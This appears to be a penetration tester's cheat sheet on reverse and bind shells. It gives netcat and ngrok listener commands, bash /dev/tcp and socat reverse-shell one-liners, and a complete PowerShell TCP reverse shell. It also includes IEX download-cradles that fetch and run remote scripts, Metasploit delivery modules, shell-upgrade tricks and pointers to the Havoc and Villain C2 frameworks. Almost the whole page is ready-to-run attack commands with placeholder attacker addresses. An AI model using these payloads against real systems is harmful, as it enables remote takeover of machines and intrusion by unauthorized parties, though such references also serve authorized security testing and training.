Reverse & Bind Shells

Generator

Online - Reverse Shell Generator

Generator

Reverse Shell

Reverse Shell Cheat Sheet - Internal All The Things

Reverse Shell

Bind Shell

Bind Shell - Internal All The Things

Bind Shell

Note

busybox nc

Listener

nc -nlvp <PORT>

Public to the world

ngrok tcp <PORT>

Main

Linux

/bin/bash -c 'bash -i>&/dev/tcp/<myIP>/<myPORT> 0>&1';

echo "<PayloadBASE64>" | base64 -d | sh

socat TCP4:<myIP>:<myPORT> EXEC:/bin/bash

Windows

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<IP>',<PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

powershell -enc <PayloadBASE64>

With Invoke-PowerShellTcp.ps1 on attacker machine and adding at the end Invoke-PowerShellTcp -Reverse -IPAddress <MY_IP> -Port <MY_PORT> On the victim

powershell IEX(New-Object Net.Webclient).downloadString('http://<MY_IP>:<MY_PORT>/Invoke-PowerShellTcp.ps1')

Metasploit

exploit/multi/script/web_delivery

exploit/windows/smb/smb_delivery

TTY

TTY

Description	Command
Bash	/bin/bash -i
Python	python3 -c 'import pty; pty.spawn("/bin/bash")'
Perl	perl —e 'exec "/bin/sh";' perl: exec "/bin/sh";
Ruby	ruby: exec "/bin/sh"
Lua	lua: os.execute('/bin/sh')
AWK	awk 'BEGIN {system("/bin/sh")}'
Socat	On Attacker socat file:`tty`,raw,echo=0 tcp-listen:<PORT2> On RevShell socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<Attacker_IP>:<PORT2>
penelope	Shell handler with auto-upgrade shells to PTY
ConPtyShell	Windows TTY stty raw -echo; (stty size; cat) | nc -lvnp <PORT> IEX(IWR http://<IP_SERVER>:<PORT_SERVER>/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell <MY_IP> <MY_PORT>

Note

<CTRL+Z>
stty raw -echo 
fg 

Command & Control (C2)

Havoc	Havoc is a modern and malleable post-exploitation command and control framework with GUI. Doc
Villain	A high level stage 0/1 C2 framework that can handle multiple reverse TCP & HoaxShell-based shells, enhance their functionality with additional features (commands, utilities) and share them among connected sibling servers (Villain instances running on different machines). Doc